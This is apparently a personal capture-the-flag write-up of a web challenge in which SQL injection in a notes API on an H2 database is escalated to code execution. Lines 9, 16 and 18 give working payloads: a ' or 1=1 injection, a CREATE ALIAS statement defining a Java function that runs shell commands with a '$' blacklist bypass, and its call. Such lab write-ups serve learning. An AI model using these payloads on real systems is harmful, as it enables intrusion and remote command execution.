1  Category: #Web 
 2  Rated Difficulty: #Easy 
 3  Personal Difficulty: #Difficult 
 4  
 5  Started the machine tried to see if there is any [[SQL Injection]] in the login field. Checked the code and see that it is using secure coding for the login form
 6  
 7  Onced logged in, get to see the notes. Found that it makes a call to `/api/notes` then checked against the code and found there is a [[HTTP#Common HTTP Methods|GET]] and [[HTTP#Common HTTP Methods|POST]] method.
 8  
 9  Make a request to the [[HTTP#Common HTTP Methods|POST]] method with the param and found that it is vulnerable because it used format string. Sample payload `' or 1=1 -- `
10  
11  But that does not lead to anything. Then google about [[H2]] database to see if I can perform [[Remote Code Execution(RCE)]] on it and found a way. 
12  
13  It allows running [[Java]] code on `alias` with that knowledge I googled for a payload that can be used and found a payload for it on [ExploitDB](https://www.exploit-db.com/exploits/44422) but since it blacklisted the *$* character, I switched the *\$\$* to `'.....'` 
14  
15  Final payload looks something like this.
16  `'; CREATE ALIAS EXECVE AS ' String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }';`
17  
18  Called the function like this `'; SELECT null,null, execve(whoami);` and got the flag